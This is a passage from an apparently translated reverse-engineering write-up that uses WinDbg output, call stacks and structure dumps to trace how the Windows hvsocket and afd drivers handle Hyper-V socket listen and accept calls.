<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdStartListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopSynchronousServiceTail</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopXxxControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!NtDeviceIoControlFile</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And only now hvsocket!VmbusTlCreateService is called. It consists of two calls: hvsocket!VmbusTlCreateObject and hvsocket! VmbusTlInitializeObjectTable. The AVL table is created</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VOID RtlInitializeGenericTableAvl(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PRTL_AVL_TABLE Table,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PRTL_AVL_COMPARE_ROUTINE CompareRoutine,- hvsocket!VmbusTlCompareGuids</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine,- hvsocket!VmbusTlAllocateForAvlTable</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PRTL_AVL_FREE_ROUTINE FreeRoutine, - hvsocket!VmbusTlFreeForAvlTable</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_opt_ PVOID TableContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After initialization of the table we receive:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt nt!_RTL_AVL_TABLE ffffb904c25c9f60</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x000 BalancedRoot : _RTL_BALANCED_LINKS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x020 OrderedPointer : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x028 WhichOrderedElement : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x02c NumberGenericTableElements : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x030 DepthOfTree : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x038 RestartKey : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x040 DeleteCount : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x048 CompareRoutine : 0xfffff80a`6d6d16c0 _RTL_GENERIC_COMPARE_RESULTS hvsocket!VmbusTlCompareGuids+0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x050 AllocateRoutine : 0xfffff80a`6d6d1db0 void* hvsocket!VmbusTlAllocateForAvlTable+0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x058 FreeRoutine : 0xfffff80a`6d6d1dd0 void hvsocket!VmbusTlFreeForAvlTable+0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x060 TableContext : 0x00000000`694c6353 Void</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlFindOrCreateService call is complete, then hvsocket!VmbusTlAssociateListenerToService is caused in which hvsocket!VmbusTlInsertObjectToTable is caused, after that the table looks so (one element was added):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt nt!_RTL_AVL_TABLE ffffb904c25c9f60</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x000 BalancedRoot : _RTL_BALANCED_LINKS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x020 OrderedPointer : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x028 WhichOrderedElement : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x02c NumberGenericTableElements : 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x030 DepthOfTree : 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x038 RestartKey : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x040 DeleteCount : 0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlAssociateListenerToPartition finishes, then afd!AfdTLListenComplete, hvsocket! VmbusTlCommonProviderCloseEndpoint and hvsocket! VmbusTlQueueEndpointAction are caused from which netio!NetioInsertWorkQueue is caused (handler proc - hvsocket!VmbusTlEndpointActionWorkQueueRoutine), we return to afd!AfdTlListenComplete where there is afd!AfdDerefTLBaseEndpoint call and then nt!IofCompleteRequest.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We return to hvsocket!VmbusTlProviderListen, next hvsocket!VmbusTlListenerProcessPendingIncomingConnection is caused further from where hvsocket!VmbusTlGetPendingConnection is caused, then hvsocket_VmbusTlpGetPendingConnection, returned value - 103h. Exit from afd.sys, we return to usermode. </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further mswsock!SockSetHandleContext is caused. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Userbuffer contents for ntdll!NtDeviceIoControlFile</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd 00F6F668 00F6F668+d4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f668 00000000 00000000 00000001 00000022</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f678 00000001 00000001 00000024 00000024</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f688 00000000 00000000 00000000 00010000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f698 00010000 00001001 00000000 000003e9</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6a8 00020026 00000008 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6b8 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6c8 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6d8 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1234191b 4ca74bf7 d7dfe086 45542bc3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6e8 00000004 7231873c 00000022 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90db8b89</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6f8 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4f790d35 ea49e98c cdb7c80a</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f708 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4570fe10 487662ad 1b7a9d77 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01223088</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f718 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f728 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f738 00000000 00000144</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We returned to our application, accept call is executed</span></div>
<ol start="4" style="margin-bottom: 0pt; margin-top: 0pt;"><ol start="4" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -36pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Accept</span></div>
</li>
</ol>
</ol>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ws2_32!WSAAccept is caused, then mswsock!WSPAccept, then ntdll!NtDeviceIoControlFile:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 (\Device\Afd\Endpoint).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, F6F5D0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 1200C (afd!AfdWaitForListen). Interesting, that IOCTL 12090 is handled by same function </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength,0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">F6F730</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 28</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>k</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdWaitForListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopSynchronousServiceTail+0x1a0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopXxxControlFile+0x674</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!NtDeviceIoControlFile+0x56</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!KiSystemServiceCopyEnd+0x13</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Input buffer, apparently, is absent, only output. Management passes to afd!AfdWaitForListen. afd!AfdGetUnacceptedConnection is caused. The first parameter - _AFD_CONNECTION, is carried out element comparison on offset +50h with the address of the structure, 0 is return. Further in IRP-> CancelRoutine writes afd!AfdCancelWaitForListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Calls of other functions do not occur, execution in afd.sys comes to the end, return directly to the appendix does not come from NtDeviceIoControlFile. Let's look where the control is transferred. All calls of nt come to the end with the instruction of sysret which transfers control in usermode to the address specified in rcx. </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>u @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ntdll!NtReadFile+0x14:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`41586194 c3 ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`41586195 cd2e int 2Eh</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`41586197 c3 ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`41586198 0f1f840000000000 nop dword ptr [rax+rax]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ntdll!NtDeviceIoControlFile:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`415861a0 4c8bd1 mov r10,rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
